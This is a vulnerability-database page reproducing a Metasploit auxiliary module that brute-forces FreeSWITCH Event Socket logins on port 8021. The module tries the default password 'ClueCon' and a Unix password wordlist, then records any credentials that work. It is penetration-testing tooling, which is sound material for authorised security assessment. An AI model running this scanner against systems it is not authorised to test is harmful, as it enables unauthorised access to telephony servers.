Lucene search
K

FreeSWITCH Event Socket Login

🗓️ 16 Jul 2022 17:42:29Reported by krastanoelType 
metasploit
 metasploit
🔗 www.rapid7.com👁 859 Views

This module tests FreeSWITCH Event Socket logins on a range of machines and report successful attempts

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/freeswitch_event_socket'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'FreeSWITCH Event Socket Login',
        'Description' => %q{
          This module tests FreeSWITCH Event Socket logins on a range of
          machines and report successful attempts.
        },
        'Author' => [
          'krastanoel'
        ],
        'References' => [
          ['URL', 'https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket']
        ],
        'DefaultOptions' => { 'VERBOSE' => false },
        'License' => MSF_LICENSE,
        'Notes' => {
          'Stability' => [CRASH_SERVICE_RESTARTS],
          'Reliability' => [],
          'SideEffects' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8021),
        OptString.new('PASSWORD', [false, 'FreeSWITCH event socket default password', 'ClueCon']),
        OptPath.new('PASS_FILE',
                    [
                      false,
                      'The file that contains a list of of probable passwords.',
                      File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt')
                    ])
      ]
    )

    # freeswitch does not have an username, there's only password
    deregister_options(
      'DB_ALL_CREDS', 'DB_ALL_USERS', 'DB_SKIP_EXISTING', 'BLANK_PASSWORDS',
      'USERNAME', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE',
      'STOP_ON_SUCCESS'
    )
  end

  def run_host(ip)
    cred_collection = Metasploit::Framework::PrivateCredentialCollection.new(
      password: datastore['PASSWORD'],
      pass_file: datastore['PASS_FILE']
    )
    cred_collection = prepend_db_passwords(cred_collection)

    scanner = Metasploit::Framework::LoginScanner::FreeswitchEventSocket.new(
      configure_login_scanner(
        host: ip,
        port: rport,
        cred_details: cred_collection,
        stop_on_success: true, # this will have no effect due to the scanner behaviour when scanning without username
        connection_timeout: 10
      )
    )

    scanner.scan! do |result|
      credential_data = result.to_h
      credential_data.merge!(
        module_fullname: fullname,
        workspace_id: myworkspace_id
      )

      if result.success?
        credential_data.delete(:username) # This service uses no username
        credential_core = create_credential(credential_data)
        credential_data[:core] = credential_core
        create_credential_login(credential_data)

        if datastore['VERBOSE']
          vprint_good("Login Successful: #{result.credential.private} (#{result.status}: #{result.proof&.strip})")
        else
          print_good("Login Successful: #{result.credential.private}")
        end
      else
        invalidate_login(credential_data)
        vprint_error("LOGIN FAILED: #{result.credential.private} (#{result.status}: #{result.proof&.strip})")
      end
    end
  end

  def check_host(_ip)
    connect
    banner = sock.get
    disconnect(sock)

    if banner.include?('Access Denied, go away.') || banner.include?('text/rude-rejection')
      return Exploit::CheckCode::Safe('Access denied by network ACL')
    end

    unless banner.include?('Content-Type: auth/request')
      return Exploit::CheckCode::Unknown('Unable to determine the service fingerprint')
    end

    return Exploit::CheckCode::Appears('FreeSWITCH event socket is accepting authentication requests')
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation